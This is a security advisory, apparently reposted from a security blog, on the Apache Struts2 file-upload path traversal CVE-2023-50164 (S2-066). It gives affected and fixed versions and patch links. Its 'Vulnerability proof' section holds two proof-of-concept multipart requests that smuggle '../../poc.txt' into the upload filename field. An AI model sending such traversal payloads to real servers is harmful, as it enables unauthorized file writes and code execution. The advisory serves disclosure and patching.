Emergency notification: Apache Struts2 high-risk vulnerability exposes remote code execution vulnerability - upgrade immediately

Apache Struts code execution vulnerability (CVE-2023-50164) allows attackers to control file upload parameter execution path traversal, and in some cases can upload malicious files to execute arbitrary code.

Vulnerability description:

Apache Struts2Is an open source web application architecture for developing Java EE web applications. It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Apache has issued a security warning that there is a serious security flaw in the Struts 2 open source web application framework, which can causeremote code execution. The vulnerability number isCVE-2023-50164, rooted in the defective "File upload logic”, which may result in unauthorizedpath traversal, and upload malicious files and achieve arbitrary code execution when exploited.

Impact of the vulnerability:

2.5.0 <= Struts <= 2.5.32

6.0.0 <= Struts <= 6.3.0

 

Vulnerability proof:

POC one:
——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="Upload"; filename="poc.txt"
Content-Type: text/plain

test

——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="uploadFileName";

../../poc.txt

——WebKitFormBoundary5WJ61X4PRwyYKlip–

POC two:

POST /s2_066_war_exploded/upload.action?uploadFileName=../../poc.txt HTTP/1.1
Host: localhost:8080
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundary5WJ61X4PRwyYKlip
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.7
Content-Length: 593

——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="Upload"; filename="poc.txt"
Content-Type: text/plain

test

——WebKitFormBoundary5WJ61X4PRwyYKlip–

Bug fixes:

An official updateable version is available. Users are advised to update to a safe version as soon as possible:

Struts >= 2.5.33

Struts >= 6.3.0.2

Patch: https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7

refer to:

https://cwiki.apache.org/confluence/display/WW/S2-066

https://github.com/apache/struts/compare/STRUTS_6_3_0…STRUTS_6_3_0_2#files_bucket

https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7

https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-File upload analysis-S2-066/

Original article by Chief Security Officer, if reproduced, please credit https://cncso.com/en/new-critical-rce-vulnerability-discovered-in-apache-struts2-html

Like (2)
Previous December 12, 2023 8:05 pm
Next December 14, 2023 10:04 pm

related suggestion